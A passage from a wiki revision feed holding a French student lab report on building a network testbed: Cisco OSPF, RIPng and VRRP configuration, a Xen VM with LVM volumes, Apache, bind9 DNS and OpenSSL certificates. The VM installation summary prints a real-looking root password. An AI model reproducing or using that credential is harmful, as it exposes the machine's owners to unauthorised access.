   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51309</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51309"/>
				<updated>2019-11-28T11:41:54Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Diverses commandes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
